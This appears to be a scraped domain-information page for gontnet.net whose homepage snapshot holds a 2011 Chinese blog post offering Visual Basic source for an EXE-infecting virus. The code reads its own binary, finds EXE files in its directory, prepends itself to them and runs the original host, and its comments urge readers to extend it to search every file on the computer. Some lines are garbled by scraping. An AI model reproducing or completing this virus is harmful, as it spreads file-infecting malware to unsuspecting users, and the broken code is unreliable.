网站综合信息 www.gontnet.net
    • 标题:
    • 心灵空间 | 感觉可以用文字所描述 
    • 关键字:
    •  
    • 描述:
    •  
    • 域名信息
    • 未注册 
    • 服务器空间
    • IP:该域名无法解析为IP
      地址:
    • 备案信息
    • 备案号:
    网站收录SEO数据
    • 搜索引擎
    • 收录量
    • 反向链接
    • 其他
    • 百度
    • 0  
    • 1  
    • 快照:无首页快照  
    • Google
    • 0  
    • 0  
    • pr:0  
    • 雅虎
    • 0  
    •  
    •  
    • 搜搜
    • 0  
    •  
    •  
    • 搜狗
    • 0  
    •  
    • 评级:1/10  
    • 360搜索
    • 0  
    •  
    •  
    域名流量Alexa排名
    •  
    • 一周平均
    • 一个月平均
    • 三个月平均
    • Alexa全球排名
    • -  
    • 平均日IP
    • 日总PV
    • 人均PV(PV/IP比例)
    • 反向链接
    • dmoz目录收录
    • -  
    • 流量走势图
    域名注册Whois信息

    gontnet.net

    未注册

    获取时间: 2014年10月04日 16:40:15
    No match for "GONTNET.NET".
    >>> Last update of whois database: Sat, 2014-Oct-04 08:43:08 GMT <<<
    同IP网站(同服务器)

    该域名无法解析为IP

    其他后缀域名
    • 顶级域名
    • 相关信息
    网站首页快照(纯文字版)
    抓取时间:2019年06月13日 12:43:39
    网址:http://www.gontnet.net/
    标题:心灵空间 | 感觉可以用文字所描述
    关键字:
    描述:
    主体:
    心灵空间
    感觉可以用文字所描述
    
    跳至正文
    首页JS 正则表达式
    VB病毒代码——只共研究使用
    发表于 2011年06月4日 由 admin
    Option Explicit
    Private Victim As String ‘要感染的文件的名字
    Private HostLen As Long ‘要感染的文件的大小
    Private vbArray() As Byte ‘病毒的代码
    Private hArray() As Byte ‘要感染的文件的代码
    Private lenght As Long
    Private MySize As Integer ‘病毒的大小
    Private Declare Function OpenProcess Lib “kernel32″ (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare Function GetExitCodeProcess Lib “kernel32″ (ByVal hProcess As Long, lpExitCode As Long) As Long
    Private Declare Function CloseHandle Lib “kernel32″ (ByVal hObject As Long) As Long
    Private iResult As Long
    Private hProg As Long
    Private idProg As Long
    Private iExit As Long
    Const STILL_ACTIVE As Long = &H103
    Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
    Private Sub form_Initialize()
    Dim i As Long
    On Error GoTo vbVerror ‘出错处理
    ‘原理:将生成病毒文件的代码读出,粘在要被感染的文件的后面。
    Open App.Path & “\” & App.EXEName & “.exe” For Binary Access Read _
    As #1
    ReDim MyArray(LOF(1) – 1)
    MySize = LOF(1)
    ReDim vbArray(MySize)
    Get #1, 1, vbArray
    Close #1
    ‘这是在读自己的代码
    Victim = Dir(App.Path & “\” & “*.EXE”) ‘随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。)
    While Victim 
    If format(Victim, “>”) ”) Then
    Open App.Path & “\” & Victim For Binary Access Read As #1
    ReDim hArray(LOF(1))
    Get #1, 1, hArray
    Close #1
    ‘读出病毒自身的代码
    If hArray(&H69) 
    i = hArray(&H3C)
    If hArray(i) = &H50 Then
    Open App.Path & “\” & Victim For Binary Access Write As #1
    Put #1, , vbArray
    Put #1, MySize, hArray
    Close #1
    End If ‘要保证被感染的不是空文件(不是圈套)
    End If
    End If
    ‘读出准备被感染的文件的代码
    Victim = Dir() ‘Next
    Wend
    ‘下面的工作是为了保证病毒不会重复感染一个文件,也不会自我感染。
    Open App.Path & “\” & App.EXEName & “.exe” For Binary Access Read As #1
    lenght = LOF(1) – MySize
    If lenght 
    ReDim vbArray(lenght – 1)
    Get #1, MySize, vbArray
    Close #1
    Open App.Path & “\” & App.EXEName & “.eve” For Binary Access Write As #1
    Put #1, , vbArray
    Close #1
    idProg = Shell(App.Path & “\” & App.EXEName & “.eve”, vbNormalFocus)
    hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
    GetExitCodeProcess hProg, iExit
    Do While iExit = STILL_ACTIVE
    DoEvents
    GetExitCodeProcess hProg, iExit
    Loop
    Kill App.Path & “\” & App.EXEName & “.eve”
    Else
    Close #1
    End If
    End
    vbVerror: ‘出错处理,空着就可以了
    End Sub
    [/hide] 
    ‘还有其他的说明:
    ’1、本代码目前仅是实验模型,给新手讲解原理之用,不会失控,绝对安全。
    ’2、本代码仅实现了感染EXE的功能,其他的功能还须你自己加入。
    ’3、为了目前的安全,本病毒只是在病毒所在的目录下随机选一个文件感染,你可以利用此功能来调试;将来你可以修改,让它不断的循环搜索计算机上的所有文件。
    ’4、最重要的:不要搞恶意破坏,否则真进了监狱后果自负!
    发表在 未分类
    |
    留下评论
    Hello world!
    发表于 2011年06月3日 由 admin
    欢迎使用 WordPress 。这是系统自动生成的演示文章。编辑或者删除它,开始您的博客!
    

    © 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询

    2026-01-08 21:29, Process in 0.0042 second.